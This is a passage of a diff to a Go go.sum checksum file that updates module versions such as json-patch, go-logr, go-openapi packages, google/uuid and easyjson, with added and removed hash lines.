v7.16.0/go.mod h1:OJ4wdbtDNk5g503kvlHLyErCgQwwzmDtaFC4XyOxXA4= github.com/elastic/go-licenser v0.3.1/go.mod h1:D8eNQk70FOCVBl3smCGQt/lv7meBeQno2eI1S5apiHQ= github.com/elastic/go-licenser v0.4.0 h1:jLq6A5SilDS/Iz1ABRkO6BHy91B9jBora8FwGRsDqUI= github.com/elastic/go-licenser v0.4.0/go.mod h1:V56wHMpmdURfibNBggaSBfqgPxyT1Tldns1i87iTEvU= 
@@ -368,12 +378,16 @@ github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1m github.com/envoyproxy/go-control-plane v0.9.7/go.mod h1:cwu0lG7PUMfa9snN8LXBig5ynNVH9qI8YYLbd1fK2po= github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= github.com/envoyproxy/go-control-plane v0.9.9-0.20210217033140-668b12f5399d/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= github.com/evanphx/json-patch v4.9.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/evanphx/json-patch v4.11.0+incompatible h1:glyUF9yIYtMHzn8xaKw5rMhdWcwsYV8dZHIq5567/xs= github.com/evanphx/json-patch v4.11.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d h1:105gxyaGwCFad8crR9dcMQWvV9Hvulu6hwUh4tWPJnM= +github.com/evanphx/json-patch v4.12.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= +github.com/evanphx/json-patch v5.6.0+incompatible h1:jBYDEEiFBPxA0v50tFdvOzQQTCvpL6mnFh5mB2/l16U= +github.com/evanphx/json-patch v5.6.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= github.com/exponent-io/jsonpath v0.0.0-20151013193312-d6023ce2651d/go.mod h1:ZZMPRZwes7CROmyNKgQzC3XPs6L/G2EJLHddWejkmf4= +github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f h1:Wl78ApPPB2Wvf/TIe2xdyJxTlb6obmF18d8QdkxNDu4= +github.com/exponent-io/jsonpath v0.0.0-20210407135951-1de76d718b3f/go.mod h1:OSYXu++VVOHnXeitef/D8n/6y4QV8uLHSFXX4NeXMGc= github.com/fatih/camelcase v1.0.0/go.mod h1:yN2Sb0lFhZJUdVvtELVWefmrXpuZESvPmqwoZc+/fpc= github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= github.com/fatih/color 
v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= @@ -389,13 +403,15 @@ github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4 github.com/fullsailor/pkcs7 v0.0.0-20190404230743-d7302db945fa/go.mod h1:KnogPXtdwXqoenmZCw6S+25EAm2MkxbG0deNDu4cbSA= github.com/fvbommel/sortorder v1.0.1/go.mod h1:uk88iVf1ovNn1iLfgUVU2F9o5eO30ui720w+kxuqRs0= github.com/garyburd/redigo v0.0.0-20150301180006-535138d7bcd7/go.mod h1:NR3MbYisc3/PwhQ00EMzDiPmrwpPxAn5GI05/YaO1SY= +github.com/getkin/kin-openapi v0.76.0/go.mod h1:660oXbgy5JFMKreazJaQTw7o+X00qeSyhcnluiMv+Xg= github.com/getsentry/raven-go v0.2.0/go.mod h1:KungGk8q33+aIAZUIVWZDr2OfAEBsO49PX4NzFV5kcQ= github.com/ghodss/yaml v0.0.0-20150909031657-73d445a93680/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/gliderlabs/ssh v0.2.2 h1:6zsha5zo/TWhRhwqCD3+EarCAgZ2yN28ipRnGPnwkI0= github.com/gliderlabs/ssh v0.2.2/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0= -github.com/go-errors/errors v1.0.1 h1:LUHzmkK3GUKUrL/1gfBUxAHzcev3apQlezX/+O7ma6w= github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q= +github.com/go-errors/errors v1.4.1 h1:IvVlgbzSsaUNudsw5dcXSzF3EWyXTi5XrAdngnuhRyg= +github.com/go-errors/errors v1.4.1/go.mod h1:sIVyrIiJhuEF+Pj9Ebtd6P/rEYROXFi3BopGUQ5a5Og= github.com/go-git/gcfg v1.5.0 h1:Q5ViNfGF8zFgyJWPqYwA7qGFoMTEiBmdlkcfRmpIMa4= github.com/go-git/gcfg v1.5.0/go.mod h1:5m20vg6GwYabIxaOonVkTdrILxQMpEShl1xiMF4ua+E= github.com/go-git/go-billy/v5 v5.2.0/go.mod h1:pmpqyWchKfYfrkb/UVH4otLvyi/5gJlGI4Hb3ZqZ3W0= 
@@ -417,28 +433,36 @@ github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V github.com/go-logfmt/logfmt v0.5.0/go.mod h1:wCYkCAKZfumFQihp8CzCvQ3paCTfi41vtzG1KdI/P7A= github.com/go-logr/logr v0.1.0/go.mod h1:ixOQHD9gLJUVQQ2ZOR7zLEifBX6tGkNJF4QyIY7sIas= github.com/go-logr/logr v0.2.0/go.mod h1:z6/tIYblkpsD+a4lm/fGIIU9mZ+XfAiaFtq7xTgseGU= -github.com/go-logr/logr v0.4.0 h1:K7/B1jt6fIBQVd4Owv2MqGQClcgf0R266+7C/QjRcLc= github.com/go-logr/logr v0.4.0/go.mod h1:z6/tIYblkpsD+a4lm/fGIIU9mZ+XfAiaFtq7xTgseGU= -github.com/go-openapi/errors v0.19.8 h1:doM+tQdZbUm9gydV9yR+iQNmztbjj7I3sW4sIcAwIzc= +github.com/go-logr/logr v1.2.0/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-logr/logr v1.2.2 h1:ahHml/yUpnlb96Rp8HCvtYVPY8ZYpxq3g7UYchIYwbs= +github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= +github.com/go-logr/zapr v1.2.0/go.mod h1:Qa4Bsj2Vb+FAVeAKsLD8RLQ+YRJB8YDmOAKxaBQf7Ro= github.com/go-openapi/errors v0.19.8/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= +github.com/go-openapi/errors v0.20.1 h1:j23mMDtRxMwIobkpId7sWh7Ddcx4ivaoqUbfXx5P+a8= +github.com/go-openapi/errors v0.20.1/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= github.com/go-openapi/jsonpointer v0.19.2/go.mod h1:3akKfEdA7DF1sugOqz1dVQHBcuDBPKZGEoHC/NkiQRg= github.com/go-openapi/jsonpointer v0.19.3/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg= github.com/go-openapi/jsonpointer v0.19.5 h1:gZr+CIYByUqjcgeLXnQu2gHYQC9o73G2XUeOFYEICuY= github.com/go-openapi/jsonpointer v0.19.5/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg= github.com/go-openapi/jsonreference v0.19.2/go.mod h1:jMjeRr2HHw6nAVajTXJ4eiUwohSTlpa0o73RUL1owJc= github.com/go-openapi/jsonreference v0.19.3/go.mod h1:rjx6GuL8TTa9VaixXglHmQmIL98+wF9xc8zWvFonSJ8= -github.com/go-openapi/jsonreference v0.19.5 h1:1WJP/wi4OjB4iV8KVbH73rQaoialJrqv8gitZLxGLtM= github.com/go-openapi/jsonreference v0.19.5/go.mod h1:RdybgQwPxbL4UEjuAruzK1x3nE69AqPYEJeo/TWfEeg= 
+github.com/go-openapi/jsonreference v0.19.6 h1:UBIxjkht+AWIgYzCDSv2GN+E/togfwXUJFRTWhl2Jjs= +github.com/go-openapi/jsonreference v0.19.6/go.mod h1:diGHMEHg2IqXZGKxqyvWdfWU/aim5Dprw5bqpKkTvns= github.com/go-openapi/spec v0.19.3/go.mod h1:FpwSN1ksY1eteniUU7X0N/BgJ7a4WvBFVA8Lj9mJglo= -github.com/go-openapi/strfmt v0.21.0 h1:hX2qEZKmYks+t0hKeb4VTJpUm2UYsdL3+DCid5swxIs= github.com/go-openapi/strfmt v0.21.0/go.mod h1:ZRQ409bWMj+SOgXofQAGTIo2Ebu72Gs+WaRADcS5iNg= +github.com/go-openapi/strfmt v0.21.1 h1:G6s2t5V5kGCHLVbSdZ/6lI8Wm4OzoPFkc3/cjAsKQrM= +github.com/go-openapi/strfmt v0.21.1/go.mod h1:I/XVKeLc5+MM5oPNN7P6urMOpuLXEcNrCX/rPGuWb0k= github.com/go-openapi/swag v0.19.2/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= github.com/go-openapi/swag v0.19.5/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= -github.com/go-openapi/swag v0.19.14 h1:gm3vOOXfiuw5i9p5N9xJvfjvuofpyvLA9Wr6QfK5Fng= github.com/go-openapi/swag v0.19.14/go.mod h1:QYRuS/SOXUCsnplDa677K7+DxSOj6IPNl/eQntq43wQ= +github.com/go-openapi/swag v0.19.15 h1:D2NRCBzS9/pEY3gP9Nl8aDqGUcPFrwG2p+CNFrLyrCM= +github.com/go-openapi/swag v0.19.15/go.mod h1:QYRuS/SOXUCsnplDa677K7+DxSOj6IPNl/eQntq43wQ= github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= -github.com/go-stack/stack v1.8.0 h1:5SgMzNM5HxrEjV0ww2lTmX6E2Izsfxas4+YHWRs3Lsk= github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY= +github.com/go-stack/stack v1.8.1 h1:ntEHSVwIt7PNXNpgPmVfMrNhLtgjlmnZha2kOpuRiDw= +github.com/go-stack/stack v1.8.1/go.mod h1:dcoOX6HbPZSZptuspn9bctJ+N/CnF5gGygcUP3XYfe4= github.com/gobuffalo/attrs v0.0.0-20190224210810-a9411de4debd/go.mod h1:4duuawTqi2wkkpB4ePgWMaai6/Kc6WEz83bhFwpHzj0= github.com/gobuffalo/depgen v0.0.0-20190329151759-d478694a28d3/go.mod h1:3STtPUQYuzV0gBVOY3vy6CfMm/ljR4pABfrTeHNLHUY= github.com/gobuffalo/depgen v0.1.0/go.mod h1:+ifsuy7fhi15RWncXQQKjWS9JPkdah5sZvtHc2RXGlg= 
@@ -473,7 +497,7 @@ github.com/godbus/dbus v0.0.0-20190422162347-ade71ed3457e/go.mod h1:bBOAhwG1umN6 github.com/godbus/dbus/v5 v5.0.3/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= github.com/godror/godror v0.24.2/go.mod h1:wZv/9vPiUib6tkoDl+AZ/QLf5YZgMravZ7jxH2eQWAE= -github.com/gofrs/flock v0.8.0/go.mod h1:F1TvTiK9OcQqauNUHlbJvyl9Qa1QvF/gOUDKA14jxHU= +github.com/gofrs/flock v0.8.1/go.mod h1:F1TvTiK9OcQqauNUHlbJvyl9Qa1QvF/gOUDKA14jxHU= github.com/gogo/googleapis v1.2.0/go.mod h1:Njal3psf3qN6dwBtQfUmBZh2ybovJ0tlu3o/AC7HYjU= github.com/gogo/googleapis v1.4.0/go.mod h1:5YRNX2z1oM5gXdAkurHa942MDgEJyk02w4OecKY87+c= github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= @@ -485,6 +509,7 @@ github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= +github.com/golang/glog v1.0.0/go.mod h1:EWib/APOK0SL3dFbYqvxE3UYd8E6s1ouQ7iEp/0LWV4= github.com/golang/groupcache v0.0.0-20160516000752-02826c3e7903/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20190129154638-5b532d6fd5ef/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= 
@@ -518,14 +543,17 @@ github.com/golang/protobuf v1.5.1/go.mod h1:DopwsBzvsk0Fs44TXzsVbJyPhcCPeIwnvohx
 github.com/golang/protobuf v1.5.2 h1:ROPKBNFfQgOUMifHyP+KYbvpjbdoFNs+aK7DXlji0Tw=
 github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
 github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
-github.com/golang/snappy v0.0.2 h1:aeE13tS0IiQgFjYdoL8qN3K1N2bXXtI6Vi51/y7BpMw=
 github.com/golang/snappy v0.0.2/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
+github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM=
+github.com/golang/snappy v0.0.4/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
 github.com/golangplus/testing v0.0.0-20180327235837-af21d9c3145e/go.mod h1:0AA//k/eakGydO4jKRoRL2j92ZKSzTgj9tclaCrvXHk=
 github.com/gomodule/redigo v1.8.2/go.mod h1:P9dn9mFrCBvWhGE1wpxx6fgq7BAeLBk+UUUzlpkBYO0=
 github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
 github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
 github.com/google/btree v1.0.1 h1:gK4Kx5IaGY9CD5sPJ36FHiBJ6ZXl0kilRiiCj+jdYp4=
 github.com/google/btree v1.0.1/go.mod h1:xXMiIv4Fb/0kKde4SpL7qlzvu5cMJDRkFDxJfI9uaxA=
+github.com/google/cel-go v0.9.0/go.mod h1:U7ayypeSkw23szu4GaQTPJGx66c20mx8JklMSxrmI1w=
+github.com/google/cel-spec v0.6.0/go.mod h1:Nwjgxy5CbjlPrtCWjeDjUyKMl8w41YBYGjsyDdqk0xA=
 github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
 github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
 github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
@@ -536,16 +564,18 @@ github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/
 github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
 github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
 github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
-github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU=
 github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
+github.com/google/go-cmp v0.5.6 h1:BKbKCqvP6I+rmFHt06ZmyQtvB8xAkWdhFyr0ZUNZcxQ=
+github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
 github.com/google/go-github/v32 v32.1.0 h1:GWkQOdXqviCPx7Q7Fj+KyPoGm4SwHRh8rheoPhd27II=
 github.com/google/go-github/v32 v32.1.0/go.mod h1:rIEpZD9CTDQwDK9GDrtMTycQNA4JU3qBsCizh3q2WCI=
 github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck=
 github.com/google/go-querystring v1.1.0 h1:AnCroh3fv4ZBgVIf1Iwtovgjaw/GiKJo8M8yD/fhyJ8=
 github.com/google/go-querystring v1.1.0/go.mod h1:Kcdr2DB4koayq7X8pmAG4sNG59So17icRSOU623lUBU=
 github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
-github.com/google/gofuzz v1.1.0 h1:Hsa8mG0dQ46ij8Sl2AYJDUv1oA9/d6Vk+3LG99Oe02g=
 github.com/google/gofuzz v1.1.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
+github.com/google/gofuzz v1.2.0 h1:xRy4A+RhZaiKjJ1bPfwQ8sedCA+YS2YcCHW6ec7JMi0=
+github.com/google/gofuzz v1.2.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
 github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs=
 github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
 github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0=
@@ -566,8 +596,9 @@ github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3
 github.com/google/uuid v1.0.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
 github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
 github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
-github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs=
 github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
+github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=
+github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
 github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg=
 github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk=
 github.com/googleapis/gnostic v0.4.1/go.mod h1:LRhVm6pbyptWbWbuZ38d1eyptfvIytN3ir6b65WBswg=
@@ -587,8 +618,9 @@ github.com/gorilla/websocket v0.0.0-20170926233335-4201258b820c/go.mod h1:E7qHFY
 github.com/gorilla/websocket v1.4.0/go.mod h1:E7qHFY5m1UJ88s3WnNqhKjPHQ0heANvMoAMk2YaljkQ=
 github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
 github.com/gosuri/uitable v0.0.4/go.mod h1:tKR86bXuXPZazfOTG1FIzvjIdXzd0mo4Vtn16vt0PJo=
-github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7 h1:pdN6V1QBWetyv/0+wjACpqVH+eVULgEjkurDLq3goeM=
 github.com/gregjones/httpcache v0.0.0-20180305231024-9cad4c3443a7/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA=
+github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79 h1:+ngKgrYPPJrOjhax5N+uePQ0Fh1Z7PheYoUI/0nzkPA=
+github.com/gregjones/httpcache v0.0.0-20190611155906-901d90724c79/go.mod h1:FecbI9+v66THATjSRHfNgh1IVFe/9kFxbXtjV0ctIMA=
 github.com/grpc-ecosystem/go-grpc-middleware v1.0.0/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs=
 github.com/grpc-ecosystem/go-grpc-middleware v1.0.1-0.20190118093823-f849b5445de4/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs=
 github.com/grpc-ecosystem/go-grpc-middleware v1.3.0/go.mod h1:z0ButlSOZa5vEBq9m2m2hlwIgKw+rp3sdCBRoJY+30Y=
@@ -658,8 +690,9 @@ github.com/jpillora/backoff v1.0.0/go.mod h1:J/6gKK9jxlEcS3zixgDgUAsiuZ7yrSoa/FX
 github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU=
 github.com/json-iterator/go v1.1.7/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
 github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
-github.com/json-iterator/go v1.1.11 h1:uVUAXhF2To8cbw/3xN3pxj6kk7TYKs98NIrTqPlMWAQ=
 github.com/json-iterator/go v1.1.11/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=
+github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
+github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
 github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU=
 github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk=
 github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU=
@@ -670,8 +703,9 @@ github.com/karrick/godirwalk v1.10.3/go.mod h1:RoGL9dQei4vP9ilrpETWE8CLOZ1kiN0Lh
 github.com/karrick/godirwalk v1.15.8/go.mod h1:j4mkqPuvaLI8mp1DroR3P6ad7cyYd4c1qeJ3RV7ULlk=
 github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs=
 github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8=
-github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351 h1:DowS9hvgyYSX4TO5NpyC606/Z4SxnNYbT+WX27or6Ck=
 github.com/kevinburke/ssh_config v0.0.0-20201106050909-4977a11b4351/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM=
+github.com/kevinburke/ssh_config v1.1.0 h1:pH/t1WS9NzT8go394IqZeJTMHVm6Cr6ZJ6AQ+mdNo/o=
+github.com/kevinburke/ssh_config v1.1.0/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM=
 github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q=
 github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00=
 github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
@@ -720,8 +754,9 @@ github.com/magiconair/properties v1.8.5/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPK
 github.com/mailru/easyjson v0.0.0-20190614124828-94de47d64c63/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc=
 github.com/mailru/easyjson v0.0.0-20190626092158-b2ccc519800e/go.mod h1:C1wdFJiN94OJF2b5HbByQZoLdCWB1Yqtg26g4irojpc=
 github.com/mailru/easyjson v0.7.0/go.mod h1:KAzv3t3aY1NaHWoQz1+4F1ccyAH66Jk7yos7ldAVICs=
-github.com/mailru/easyjson v0.7.6 h1:8yTIVnZgCoiM1TgqoeTl+LfU5Jg6/xL3QhGQnimLYnA=
 github.com/mailru/easyjson v0.7.6/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
+github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0=
+github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
 github.com/markbates/errx v1.1.0/go.mod h1:PLa46Oex9KNbVDZhKel8v1OT7hD5JZ2eI7AHhA0wswc=
 github.com/markbates/oncer v0.0.0-20181203154359-bf2de49a0be2/go.mod h1:Ld9puTsIW75CHf65OeIOkyKbteujpZVXDpWK6YGZbxE=
 github.com/markbates/oncer v1.0.0/go.mod h1:Z59JA581E9GP6w96jai+TGqafHPW+cPfRxz2aSZ0mcI=
@@ -731,8 +766,9 @@ github.com/matryer/is v1.2.0 h1:92UTHpy8CDwaJ08GqLDzhhuixiBUUD1p3AU6PHddz4A=
 github.com/matryer/is v1.2.0/go.mod h1:2fLPjFQM9rhQ15aVEtbuwhJinnOqrmgXPNdZsdwlWXA=
 github.com/mattn/go-colorable v0.0.9/go.mod h1:9vuHe8Xs5qXnSaW/c/ABM9alt+Vo+STaOChaDxuIBZU=
 github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
-github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U=
 github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
+github.com/mattn/go-colorable v0.1.12 h1:jF+Du6AlPIjs2BiUiQlKOX0rt3SujHxPnksPKZbaA40=
+github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4=
 github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4=
 github.com/mattn/go-isatty v0.0.4/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4=
 github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
@@ -742,8 +778,9 @@ github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27k
 github.com/mattn/go-oci8 v0.1.1/go.mod h1:wjDx6Xm9q7dFtHJvIlrI99JytznLw5wQ4R+9mNXJwGI=
 github.com/mattn/go-runewidth v0.0.2/go.mod h1:LwmH8dsx7+W8Uxz3IHJYH5QSwggIsqBzpuz5H//U1FU=
